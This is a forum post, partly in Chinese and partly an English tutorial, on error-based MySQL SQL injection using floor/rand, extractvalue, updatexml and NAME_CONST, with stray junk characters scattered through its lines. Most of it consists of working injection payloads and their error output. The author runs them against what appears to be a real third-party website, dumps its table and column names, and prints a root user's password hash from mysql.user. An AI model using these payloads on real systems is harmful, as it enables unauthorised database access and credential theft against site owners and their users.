|
1、通过floor报错 可以通过如下一些利用代码 and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a); and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2))); 举例如下:
! r/ y r' d, P+ h* a# r/ ]9 W' t首先进行正常查询: mysql> select * from article where id = 1;
. ]0 q. e5 B& {' o6 p+—-+——-+———+
% v7 n" M+ _ c" s8 O' \2 A| id | title | content |
& S+ W2 X0 R- Y' N) \) ~% d5 C+—-+——-+———+
% t: E- I! ~2 I; V7 H0 e| 1 | test | do it |
7 s1 i0 ~9 I2 I9 U* Q0 R; l- O" o+—-+——-+———+ 假如id输入存在注入的话,可以通过如下语句进行报错。 mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);3 U/ F0 |9 Y& t f
ERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’ 可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
+ H5 ~& ]/ v3 w% H( r$ @$ o例如我们需要查询管理员用户名和密码: Method1: mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
; ?7 \ `/ h6 u! dERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ Method2: mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
/ ~" |% K9 W6 J1 Y$ vERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ 2、ExtractValue
0 U2 n1 y* [! L; o O* u1 [4 d) J测试语句如下 and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1))); 实际测试过程 mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–, X# q5 w0 @$ ?4 J( o
ERROR 1105 (HY000): XPATH syntax error: ’\admin888′ 3、UpdateXml 测试语句 and 1=(updatexml(1,concat(0x3a,(select user())),1)) 实际测试过程 mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’
: Y) d4 o8 Y2 U2 y) K- i% R x% S" V
再收集: : \$ ^+ `) W% H4 \. R( p
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c) ! u! C. _/ I( R4 O
8 t3 e6 W% i: ^3 a$ ~
Error uplicate column name ‘5.0.27-community-nt’Erroruplicate column name ‘5.0.27-community-nt’8 q4 t. K$ A- Y% P+ j; r/ n8 ^+ R( Z
! T+ m% y$ {9 l* j# Phttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)
3 A! n5 x: o, {* L& t+ X1 o/ O) c3 e' W5 ]" s. o( }
Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′ . e' H5 H# x" \, P7 t5 A
3 k4 _8 k! i0 u# h0 ?0 y" [4 @( e
MYSQL高版本报错注入技巧-利用NAME_CONST注入% ]0 [2 Y' L2 a# d/ p! O
It's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it. * [4 \0 t+ M a; k/ M
% ?$ v1 r) l$ V/ `& k5 J
" J1 X( d1 ^' D( A$ w相关信息; Z" V* d, G+ f' j, t) D- _
! r9 A% W. ]8 T% T m6 B- d" y
NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.
$ A* S/ ^: V3 ]/ A% ?. R( g! J; b2 a A1 |+ S+ ~2 K
Code:
3 Z9 L7 h" Z( l( TNAME_CONST(DATA, VALUE). O9 b F: y _+ a
! Z: n( ]8 Y; l3 t8 G7 v9 x3 }
Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.
' e% o b0 A+ y! [# j" F7 r
& f6 w2 E" z5 w1 Z9 j0 l, ?9 GSELECT NAME_CONST('TEST', 1)
5 G/ t' O1 D( S, H+ u. ?( O6 q; ?3 O; J& c9 q q9 Q- y* p: @/ k$ d# Y
1 V0 F0 s/ C; t
! r7 O% k- Y2 U$ b
|---------------|- |. X( G$ @7 ^" n! \2 `4 U
| TEST |" l- n* X+ {4 S: ^
| |7 l f1 {. B$ w7 d" [2 Z6 ?
|---------------|
" l4 s7 x& I, G+ e| 1 |
n) a$ b* j! z| |, M, C4 v- O' |9 y
|---------------|
4 ?5 g( E& G& @1 d7 T, ~6 N4 [, ], j m+ V1 e5 Y) Z
p, z" z+ K3 Z7 x+ g, ]/ O& f" J# D/ e0 g3 h3 s& x
5 a% z2 W+ P { G, U$ Ghttp://dev.mysql.com/doc/refman/5.0/en/m...name-const+ T- L j: b' d$ F/ y2 p) v0 z# I
Intro to MySQL Variables
) Q0 ?. H4 R6 m" j% g& C" Z( U
Once you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.
! ?' \1 Z$ u: p |4 U4 h
7 ^5 z/ S: F. y; p! mCode:
1 g1 O I) M) U$ n6 {/ l4 w2 L; ehttp://www.baido.hk/qcwh/content ... ;sid=19&cid=261* V9 ^! n7 \" x3 p
2 V$ ^/ n! L: J+ t! p0 k7 }3 c
/ G9 y3 s ]8 ]( N
/ J% _, s% w# {+ m/ b9 [% z$ }4 I8 k. E0 G' Q- s* Y) y
" Z4 o! { O5 x# L, W2 H) u8 ]Code:( G! u7 Q) f% ^3 W. |5 c
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--' V1 w; N7 Z0 G
6 k" H! t( o1 M* O7 y% D
7 b5 }! i: S) u" ?VAR = Your MySQL variable.5 ?! A$ k, N- ~0 f
8 r: ?$ Z+ m9 {/ y% Q: [
MySQL 5.1.3 Server System Variables
; s! E/ Z5 n5 J! I) W U
& E: D+ D8 P$ WLet's try it out on my site..
) U/ k5 C# U. m/ b# H, Q$ I$ ~' E! s# y
Code:
+ L/ p6 ^/ N9 P, O: B4 l: S# }http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--
0 l8 y" S/ ~, H, z) U; L
) ?* G, V6 K0 Z6 d; O1 }Erroruplicate column name '5.0.27-community-nt'
5 c. y* p. L; }' g. c
4 L/ B0 F v5 T" [/ `+ X4 ~; _- n# C8 Y) _0 _% m5 v5 H) {3 h
$ B! H/ @1 j: g4 x" v. b
3 l( M. ~* C: o, \
9 ]: I4 f2 s0 g) M" N9 pNow I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...
) h" g, d# f2 K0 R# s& M0 h$ _6 l0 M# V$ F7 u
Data Extraction
# J) w; x" G, A
/ T' l! D2 b$ D! BCode:
( E. y( C8 f5 a: x/ z9 C+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--
# Q* b% P0 ?6 t6 _$ a5 P1 ~ X' o: T; W# P+ {5 \- P' b
! N7 m! P, M' [, ^9 n0 L( ?6 \We should get a duplicate column 1 error...
3 y9 f4 i& B# I. T
& ]! q5 L7 C/ D7 d- v8 s- W2 vCode:: f M5 \& P0 i5 C0 b5 e: p3 [4 }8 j
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--% g' h3 M8 D/ V7 ^6 G
6 f8 G- l0 C; p! n) y* q( |9 z) k r
Erroruplicate column name '1
+ {0 j |9 t/ S: x
) n+ e5 F, v3 b# S6 S6 r4 E7 M* K; ~4 `! G
( z' @; T) Z7 l2 ^$ Y% d
# x q( O# J% m3 w9 E+ A' X% I7 @( K* b' I% L0 C
4 n, G4 u* J' j/ u' S
Now let's get the tables out this bitch..! N& G7 F: K& c5 D2 o% X
& d2 M! q$ v/ c R R. T/ WCode:
' }5 k8 J. q0 O7 k* N# \: C3 D+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--+ o4 I% t3 Q2 I7 S
?% w; _( _& e/ R) j2 k
% n( v' H% F/ U
Let's see if it works here, if it does, we can go on and finish the job.
+ |1 s/ z: T2 S2 H# M, T: ^0 E7 D) |& ~) e
Code:$ ^( Z& v' m' o) W, U: j
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
9 r) ~6 O# C2 R8 ~; p7 y7 P2 y* M5 c: W9 D6 j4 k: x
$ N; j+ B5 E. U" W5 J
Erroruplicate column name 'com_admanage0 V4 O9 A% s0 D
% e. @! I- `3 G# |/ u1 `) w; M* j5 H8 c3 C- A; g
7 t3 w X! J) f9 h0 }7 M! e2 t' R3 |- Y/ y
4 p9 U( o/ e e0 L1 F/ D0 S" S0 D) _7 I4 w" P
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.
4 f* |! c+ r0 ^& C7 _7 t2 h C" A& Z2 H. l
Let's get the columns out of the user table..6 k$ Z, L$ Q4 D, a) i, l; A* ~
3 i$ U. H+ ?7 @0 i( G0 ^5 O' RCode:8 d$ [. K* y3 v' r
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--! ^% y! ^" ^; o( l! t" s3 r2 Y
& M. }, G, \" g0 G. t
; I; w/ x! \8 }, W8 h P
So mine looks like this, and I get the duplicate column name 'Host'.
q2 r2 G$ g5 }! i, v# |2 o4 d- v/ M. S/ Y; r. Z: B( C
Code:
0 _2 E E; Z9 Jhttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--
9 U; C" T3 L* T& b7 A( {1 k p9 G2 x+ K5 D- y7 m: j2 R
Erroruplicate column name 'Host'
5 B8 H" w: ~# C" i" v
3 ~0 F$ I/ T5 A2 f/ @
3 [% `/ @6 a! F
# j% q7 i y* M" _! [
' a q! E/ _3 p4 J$ f4 T, x' H* b ^3 M
$ b- `6 Z7 ?! f; X8 k NWoot, time to finish this bitch off.
! ^1 v/ P. C! n: }! Y, s
2 f% r- K: o8 X* XCode:
1 l2 v4 Q9 P) p4 ]+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--0 w& _: _3 |; M4 |" f
4 W- `/ t8 L' s7 @1 z. \3 O4 v1 E) k- Y( |. G$ A. G3 c" n2 q
So mine looks like this...; I9 H9 O& Y# @8 T
. T! y! A5 h; H1 G! R" ~' w9 FCode:
0 d+ i( f8 e7 ~2 t. c. Khttp://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--
, x( P* M4 O$ p4 ?: v8 ?! S ~- _& S
Erroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
9 }" e/ z* H% I) {' h/ V9 V5 I$ r: F, Z; w
! f5 E1 E. B+ t. u$ p' L
2 T: A8 c3 Z0 x8 n
2 `' {5 `5 z2 j0 C' s2 j
1 I& Y7 t# s K# H" i0 I i- [ a& I. C4 ?; f0 R* S
And there we have it, thanks for reading.0 h. [+ j) Z/ a9 v7 @
* Q& j2 p4 _# L; X5 ~7 f
|
发表于 2015-11-11 19:03:37
收藏
支持
反对